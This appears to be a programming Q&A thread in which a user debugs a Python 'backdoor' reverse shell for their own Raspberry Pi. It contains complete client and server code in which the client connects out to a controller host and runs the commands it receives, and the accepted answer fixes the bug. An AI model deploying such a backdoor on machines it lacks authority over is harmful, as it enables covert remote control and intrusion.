# can't change directory using python sockets

Tags: python, sockets

I am building 'backdoor' for my raspberry.
so I have problem, after creating interactive shell, I can't change dir.

I edited my original code to make it short. I am trying to resolve this problem around 2-3 hours.

[python3 - cd is not working in reverse shell](https://stackoverflow.com/questions/63740813/python3-cd-is-not-working-in-reverse-shell) - **Not Working**

[Backdoor Shell doesn't allow me to change Directory](https://stackoverflow.com/questions/47019513/backdoor-shell-doesnt-allow-me-to-change-directory) - **Not Working**

**Client**:

```
import socket, json
import os
import subprocess
import sys

SERVER_HOST = '192.168.100.8'
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"


s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))

snd = []

data = json.dumps({"cwd": os.getcwd(), "usr": os.getlogin()})
s.send(data.encode())

while True:
    command = s.recv(BUFFER_SIZE).decode()
    if command == 'shell':
        while True:
            command = s.recv(BUFFER_SIZE).decode()

            if command.lower() == "exit":
                break
            if command.startswith("cd "):
                try:
                    os.chdir(f'{os.getcwd()}/{str(command[3:])}')
                except FileNotFoundError as e:
                    output = str(e)
                else:
                    output = ""
            else:
                output = subprocess.getoutput(command)
            cwd = os.getcwd()
            message = f"{output}{SEPARATOR}{cwd}"
            s.send(message.encode())
            if command == 'exit':
                break
    else:
        if command.lower() == "exit":
            break
        else:
            output = subprocess.getoutput(command)
        cwd = os.getcwd()
        message = f"{output}{SEPARATOR}{cwd}"
        s.send(message.encode())
s.close()
```

**Server**:

```
import socket,json
import os

SERVER_HOST = "192.168.100.8"
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_HOST, SERVER_PORT))
s.listen()

while True:
    client_socket, client_address = s.accept()

    data = json.loads(client_socket.recv(BUFFER_SIZE).decode())
    while True:
        print("TYPE SHELL")
        tmp = input(f"[*] Enter command: ")
        if tmp.lower() == 'shell':
                print("[*] Opening interactive shell")
                command = input(f"{data['cwd']} $: ")
                while command != 'exit':
                    if not command.strip():
                        continue
                    client_socket.send(command.encode())
                    output = client_socket.recv(BUFFER_SIZE).decode()
                    results, cwd = output.split(SEPARATOR)
                    print(results)
                    command = input(f"{data['cwd']} $: ")
                print('[!] Closing interactive shell')
```

This is what I see in the shell:

```
/home/pi $: is
1
Bookshelf 
client.py 
Desktop
Documents 
Downloads 
Music
Pictures 
Public
rm.sh
Templates 
Videos
/home/pi $: cd 1

/home/pi $: pwd
/home/pi
/home/pi $: mkdir 2 && cd 2 && touch 1 && ls && pwd 
1
/home/pi/2
/home/pi $:
```

Comment: Where is the code that splits up a command line containing `&&`?

Comment: it does't splits it

Comment: That's why it doesn't work. You have `cd 2` after `&&`, but your code only checks for `cd` at the beginning of the command. `if command.startswith("cd "):`

Comment: no i typed that to check if command is working. I mean only cd Directory is not working

Comment: cd 1 must work, it just dont change directory, os.chdir not working

Comment: The prompt shows `data['cwd']`. You never update this with the response from the client.

Comment: that is not problem right now, i will fix that later, anyways pwd shows that i am in same directory

Comment: I'm trying to run the code here, but I'm confused about how to use it. First I have to type `shell` to get the server to start the interactive shell. Then I need to type it again to send `shell` to the client, so it will start its reverse shell. Is that right?

Comment: But when I do that, the server doesn't prompt for another command, because it's waiting for something from the client, but the client doesn't send a response to the `shell` command. It's waiting for another input. So it's deadlocked.

Comment: It looks like you never entered `shell` a second time. So you never go into the inner loop on the client that looks for `cd` commands.

Comment: you just enter shell one time and then just enter command

Answer (score 0, accepted):

The server needs to send the `shell` command to the client when you start the reverse shell. Otherwise, the client won't go into the inner `while` loop that contains the code that looks for the `cd` command.

So add the line:

```
                client_socket.send("shell".encode())
```

before

```
                print("[*] Opening interactive shell")
```